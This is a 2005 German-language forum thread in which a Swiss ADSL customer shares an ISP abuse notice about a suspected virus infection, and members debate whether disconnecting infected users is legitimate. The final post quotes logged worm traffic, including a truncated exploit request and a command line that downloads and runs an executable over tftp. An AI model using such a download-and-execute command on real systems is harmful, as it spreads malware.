BlackBoard » Computerecke » Netzwerke/Telekommunikation » Provider kappt Leitung aufgrund von Virusverdacht.. » Hallo Gast [Anmelden|Registrieren]
Letzter Beitrag | Erster ungelesener Beitrag Druckvorschau | An Freund senden | Thema zu Favoriten hinzufügen
Neues Thema erstellen Antwort erstellen
Zum Ende der Seite springen Provider kappt Leitung aufgrund von Virusverdacht..
Beiträge zu diesem Thema Autor Datum
 Provider kappt Leitung aufgrund von Virusverdacht.. ramius 12.09.2005 14:07
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. Misel 12.09.2005 15:25
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. PygoscelisPapua 12.09.2005 16:30
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. ramius 12.09.2005 18:08
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. Gh0st 12.09.2005 18:13
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. Tehocan 12.09.2005 19:10
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. PygoscelisPapua 12.09.2005 19:44
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. LX 12.09.2005 19:46
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. Black Star 13.09.2005 00:01
 RE: Provider kappt Leitung aufgrund von Virusverdacht.. CDW 13.09.2005 00:46

Autor
Beitrag « Vorheriges Thema | Nächstes Thema »
ramius ramius ist männlich
localhost


Dabei seit: 04.05.2003
Beiträge: 68
Herkunft: welt/europa/CH

Achtung Provider kappt Leitung aufgrund von Virusverdacht..       Zum Anfang der Seite springen

Moin zusammen...

Ich habe ein ADSL-Abo beim Schweizer ISP Bluewin, doch vor einigen Tagen bekam ich eine Mail, die mich ziemlich verärgerte:

Zitat:
Liebe Bluewin-Kundin,
Lieber Bluewin-Kunde

Sie haben ein Bluewin-Abonnement auf unserem Server registriert. Swisscom
Fixnet ermöglicht, neben der Benutzung der Bluewin Plattform, das Surfen im
Internet.

Wir weisen in unseren Allgemeinen Geschäftsbedingungen (AGB) und in den
Leistungsbeschreibungen unsere Kunden auf die gesetzlichen und vertraglichen
Regeln hin, welche es im Internet zu respektieren gilt (Strafgesetzbuch,
Leistungsbeschreibung Bluewin, Netiquette).

Wir haben von Bluewin-Kunden, Kunden anderer Anbieter und/oder Internet-
Providern Hinweise erhalten, die auf eine Vireninfektion Ihres Computers
schliessen lässt.

Die Gefahren im Internet nehmen immer grössere Ausmasse an. Gemeinsam mit
Ihnen, geschätzter Kunde, wollen wir alles daran setzen, aktiv gegen Spam und
Viren vorzugehen.

Ist Ihr PC einmal infiziert, so richten Viren und Trojanische Pferde bei Ihnen
und weiteren Benutzern Schaden an, ohne dass Sie dies bemerken. Aufgrund dessen
bitten wir Sie, Ihren Computer umgehend auf Sicherheitsprobleme wie Viren und
Trojanische Pferde zu überprüfen oder sich von einer Fachperson beraten zu
lassen.

Unter folgendem Link erfahren Sie mehr über

- Trojanische Pferde sowie deren Entfernung:
http://de.bluewin.ch/services/sicherheit...en_trojaner_de/
- Viren sowie deren Entfernung:
http://de.bluewin.ch/services/sicherheit..._erstehilfe_de/

Sollten Sie im Moment keine Zeit dazu haben, so trennen Sie bitte jetzt Ihren
Computer vom Internet. Schalten Sie dazu entweder das Modem oder den Router aus
oder ziehen Sie den Netzstecker Ihres Modems/Router. Somit findet keine weitere
Verbreitung der Viren über Ihren PC statt. Verbinden Sie Ihren PC erst wieder
mit dem Internet um den PC zu säubern.

Bei Fragen steht Ihnen unser Support gerne zur Verfügung:
http://de.bluewin.ch/kundencenter/index.php/kontakt_index

Falls Sie die geforderten Massnahmen nicht durchführen und uns aufgrund dessen
nach fünf Tagen weitere Hinweise erreichen die Ihren Internetanschluss
betreffen, behalten wir uns die Sperrung desselben bis zum Entfernen des Virus
vor.

Hinweis: Die Verwendung aller Programme, die in diesem Mail erwähnt oder auf
den obigen Internet-Seiten angeboten werden, erfolgt auf eigene Verantwortung.
Bluewin übernimmt keinerlei Haftung für die Funktion dieser Programme oder für
irgendwelche Auswirkungen ihrer Verwendung.

Besten Dank für Ihr Verständnis.

Freundliche Grüsse

Swisscom Fixnet AG
Bluewin Abuse Handling


Die notwendigen Massnahmen zur behebung des Problems sind bereits getroffen, mich würde aber interessieren, ob das überhaupt rechtmässig ist und ob das bei anderen Providern auch üblich ist.


MFG Ramius
12.09.2005 14:07 ramius ist offline E-Mail an ramius senden Beiträge von ramius suchen
Misel Misel ist männlich
Hüter des Kitkat


images/avatars/avatar-2084.png

Dabei seit: 02.11.2002
Beiträge: 1.203
Herkunft: live://home.berlin.d e

      Zum Anfang der Seite springen

hmm, ob das rechtmäßig ist, kann ich nicht sagen. Andererseits finde ich es gut, dass ein ISP endlich mal klar Schiff macht und die Verbindung kappt.

User müssen einfach ein höheres Sicherheitsbewusstsein entwickeln.

__________________
LAUFT! Ich spiele KILLERSPIELE!
12.09.2005 15:25 Misel ist offline E-Mail an Misel senden Homepage von Misel Beiträge von Misel suchen
PygoscelisPapua PygoscelisPapua ist männlich
BlackBoarder


images/avatars/avatar-2293.png

Dabei seit: 20.12.2003
Beiträge: 1.309
Herkunft: Kiel, Schleswig-Holstein, Germany

      Zum Anfang der Seite springen

Was mich dabei ein wenig irritiert:

Zitat:
Wir haben von Bluewin-Kunden, Kunden anderer Anbieter und/oder Internet-
Providern Hinweise erhalten, die auf eine Vireninfektion Ihres Computers
schliessen lässt.
[...]
Falls Sie die geforderten Massnahmen nicht durchführen und uns aufgrund dessen nach fünf Tagen weitere Hinweise erreichen die Ihren Internetanschluss
betreffen, behalten wir uns die Sperrung desselben bis zum Entfernen des Virus
vor.


Woher krigen die ihre sogenannten "Hinweise"? Ich find es generell nicht richtig - jeder der einen Rechner hat, ist in erster Linie selbst für diesen verantwortlich und der ISP sollte da imho nix zu melden haben. Die User, die kein Sicherheitsbewusstsein mitbringen, werden früher oder später eh auf den Mund fallen - und dann daraus mehr lernen als jemand, der alle 3 Monate seinen Virenscanner anschmeißt, da er eine neue eMail von seinem ISP bekommen hat...

Und dass ich jemand andern anschwärzen kann find ich ja sowieso ungeheuerlich - aber wenn ich jetzt wieder mit dem Beispiel komm, dass ich dann meinen Nachbarn anschwärze, weil ich mit dem eh immer wieder krach hab, dann kommt gleich wieder was von wegen "Wegen solcher Leute wie Dir...." daher lass ichs Zunge raus

__________________
There are only two kinds of programming languages: those people always bitch about and those nobody uses.
(Bjarne Stroustrup)
*
Moving on to pastures new
GPG Key

12.09.2005 16:30 PygoscelisPapua ist offline Homepage von PygoscelisPapua Beiträge von PygoscelisPapua suchen
ramius ramius ist männlich
localhost


Dabei seit: 04.05.2003
Beiträge: 68
Herkunft: welt/europa/CH

Themenstarter Thema begonnen von ramius
      Zum Anfang der Seite springen

hmm...

Zitat:
Woher krigen die ihre sogenannten "Hinweise"?


das nimmt mich eben auch wunder, vor allem desswegen weil es in der Schweiz ein Datenschutzgesetz gibt.

MFG Ramius
12.09.2005 18:08 ramius ist offline E-Mail an ramius senden Beiträge von ramius suchen
Gh0st Gh0st ist männlich
Senior Member


images/avatars/avatar-1776.jpg

Dabei seit: 27.06.2004
Beiträge: 376
Herkunft: Will mir keiner sagen!!!

      Zum Anfang der Seite springen

Genau da würde ich ansetzten und ma fragen wo sie denn die Hinweise herbekommen...das kann ja eigentlich gar net sein...eiegntlich ist es dem Provider doch egal wer Viren auf seinem PC hat jeder ist für sich selber verantworlich und es gibt ja sogar gratis Firewalls und Antivirenprog(ein Hoch auf AntiVir)!!
Anschereiben würd ich die schon...naja wenn du lust hast dann poste doch mal deinen Brief/Mail und die Antwort würd mich schon interessieren wie sie das begründen..
MFG Gh0st

__________________
===~~~Alle Information dient gegenwärtig dazu, Antwort auf nicht gestellte Fragen zu geben und Angst zu machen vor zu stellenden.===~~~

~~~~by Ghost~~~
12.09.2005 18:13 Gh0st ist offline E-Mail an Gh0st senden Beiträge von Gh0st suchen
Tehocan Tehocan ist männlich
Mnemosyne


images/avatars/avatar-2087.jpg

Dabei seit: 31.07.2003
Beiträge: 427
Herkunft: Lost in The Internet

      Zum Anfang der Seite springen

da das per mail kam, würde ich das nicht unbedingt als echt einstufen. der ISP übermittelt ja nur die datenpakete, und darf die an sich gar nicht prüfen oder irgendwelchen ominösen hinweisen nachgehen.

ansonsten:

mit finger auf ramius zeig und laut: "der hat ein virus" ruf!

__________________
Das Chaos besiegt die Ordnung, weil es besser organisiert ist.
12.09.2005 19:10 Tehocan ist offline E-Mail an Tehocan senden Beiträge von Tehocan suchen
PygoscelisPapua PygoscelisPapua ist männlich
BlackBoarder


images/avatars/avatar-2293.png

Dabei seit: 20.12.2003
Beiträge: 1.309
Herkunft: Kiel, Schleswig-Holstein, Germany

      Zum Anfang der Seite springen

Zitat:
Original von Tehocan
da das per mail kam, würde ich das nicht unbedingt als echt einstufen.


Hab ich mir auch gedacht - aber die Seite ist ja echt, wenn ich das richtig sehe, also hätte da niemand von was, wenn die Mail gefaket wurde - nachvollziehen hätt ichs gekonnt, wenn es sich da um irgend eine phishing-Seite handelt, wo man dann Benutzerkennung und Passwort nochmal eingeben soll, um weiter zu kommen, oder aber wo dann ein Download gestartet werden soll, der verviert ist... aber das ist ja alles nicht der Fall, daher nehm ich schon an, dass die Authenzität der Mail gewärleistet ist.

Absichern könnte man sich in diesem Fall aber durch einen Anruf bei der Supporthotline, oder einer Mail an Bluewin [und nicht als Respond auf die Mail da die Mailadresse vielleicht tatsächlich nicht echt ist]

__________________
There are only two kinds of programming languages: those people always bitch about and those nobody uses.
(Bjarne Stroustrup)
*
Moving on to pastures new
GPG Key

12.09.2005 19:44 PygoscelisPapua ist offline Homepage von PygoscelisPapua Beiträge von PygoscelisPapua suchen
LX LX ist männlich
El Comandante en Jefe


images/avatars/avatar-2290.gif

Dabei seit: 25.11.2001
Beiträge: 5.372
Herkunft: Berliner Bronx

Achtung       Zum Anfang der Seite springen

Woher die die Daten nehmen? Beispiel: Ein Webseitenbetreiber findet in seinen Serverlogs massenweise "Hackversuche", die auf einen IIS-Wurm hin deuten. Die IP führt via Whois zu Bluewin und wird an abuse@bluewin.de geschickt... zack.

Da ist es doch von Seiten Bluewins das vernünftigste, die Virenschleuder einfach vom Netz zu nehmen, falls der Administrator der Maschine (auch wenn's in diesem Fall ein Endverbraucher ist) die Sache nicht bereinigt.

Das einzige, was mich daran stören würde, ist dass keine konkreten Hinweise genannt wurden, um welche Art von Befall es sich handelt, denn so könnte dem User wie Plüschgo bereits sagte, ein bisschen Sicherheitsbewusstsein Zwangs-eingetrichtert werden Augenzwinkern

Oder sollen andere im Netz darunter leiden, dass einer sein System net sauber halten kann?

__________________
JS-Games.de - Misled Scripting Skills Gone Mad | Meine Filmkritiken | Urban Photography
Kommt mal in den IRC-Channel: irc.eu.freenode.net | Port 6667 | #blackboard

"Ever tried. Ever failed. No matter.
Try again. Fail again. Fail better."
- Samuel Beckett

12.09.2005 19:46 LX ist offline E-Mail an LX senden Homepage von LX Beiträge von LX suchen
Black Star Black Star ist männlich
Der Pate [Admin]


images/avatars/avatar-2158.jpg

Dabei seit: 11.12.2001
Beiträge: 2.282
Herkunft: /dev/stderr

      Zum Anfang der Seite springen

Der Provider selbst kann auch den Traffic analysieren oder Portscans machen, um Trojaner zu finden.

Macht die Uni bei uns auch - die Scannen aktiv die verbundenen Rechner.
Und wer zuoft auffaellt muss halt seinen Rechner saubermachen, und seinen Zugang wieder freischalten lassen.

__________________
vescere bracis meis

13.09.2005 00:01 Black Star ist offline E-Mail an Black Star senden Homepage von Black Star Beiträge von Black Star suchen
CDW CDW ist männlich
eine Simulation


Dabei seit: 12.10.2002
Beiträge: 1.329
Herkunft: CreateRemoteThread

      Zum Anfang der Seite springen

hm, wie versucht das Netz ist, dürfte ich vor kurzem bewundern, als ich mal meinen Webserver zu Testzwecken startete.
Zitat:

84.60.40.52 <-IP des Anfragers
GET / HTTP/1.0
Host: 84.60.128.102 <-meine eigene
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFB

Was mich allerdings wunderte: die IPs wechselten recht schnell, blieben aber im Arcor-"Bereich":
84.60.170.26
84.60.45.66
84.60.40.56
Peinlicherweise kenne ich jetzt nicht die genaue Bezeichnung dafür (Subnetzberich ? k.A)
ca. 1 "Angriff" pro Minute. Und die IPs waren nach kurzer Zeit nicht mehr erreichbar (kein Ping).Auch lief anscheinend kein Webserver dahinter (zumindest keine Antwort bei telnet IP:80 , was ja nichts heißen muss).Laut google ist es zwar ein Wurm und soll etwa sowas ausführen wollen:
Zitat:
cmd /c tftp -i 0.0.0.0 GET wuamkop.exe&start wuamkop.exe&exit
Aber da müsste doch ein "versender" dahinterstecken. Und so dämlich kann keiner sein, der mehrmals versucht auf den gleichen Server den gleiche Exploit anzuwenden und sich dazu mehrmals einwählt Augen rollen . Und dass es soviele Webserver in dem "Subadressraum" gibt die auch noch alle "verseucht" sind möchte ich nicht glauben.

Zurück zum Thema: im Prinzip schließe ich mich LX und BlackStar. Man sollte allerdings zumindest den groben Ansatz mitliefern (also die Email etwas ausgefallener generieren lassen Augenzwinkern ) damit der User auch weiß, was da schief gelaufen ist. Ob es rechtlich Probleme gibt, bezweifele ich - zumindest in Deutschland kann man sich seine Geschäftspartner aussuchen (solange man dabei nicht diskriminierend wird) und auch entsprechende Klausel im Vertrag haben. Ich denke hier ist es so ähnlich wie mit einem Hausverbot.

Zitat:
Ich find es generell nicht richtig - jeder der einen Rechner hat, ist in erster Linie selbst für diesen verantwortlich und der ISP sollte da imho nix zu melden haben

Generell würde ich zustimmen - wenn die betroffenen Rechner nicht die anderen beeinträchtigen würden. Denn entweder verursacht der Wurm/schädling direkt Traffik oder man bekommt den in Form von Spammails über die Bot-Netze bzw. Ddos Attacken. Da dadurch für mancheinen ein großer Schaden entstehen kann (viel Traffik, Webseite nicht erreichbar) obwohl er sein System aktuell hält und sich darum kümmert, sollte man schon solche User zumindest darauf hinweisen.
13.09.2005 00:46 CDW ist offline E-Mail an CDW senden Homepage von CDW Beiträge von CDW suchen
Baumstruktur | Brettstruktur
Gehe zu:
Neues Thema erstellen Antwort erstellen
BlackBoard » Computerecke » Netzwerke/Telekommunikation » Provider kappt Leitung aufgrund von Virusverdacht..

Forensoftware: Burning Board 2.3.6, entwickelt von WoltLab GmbH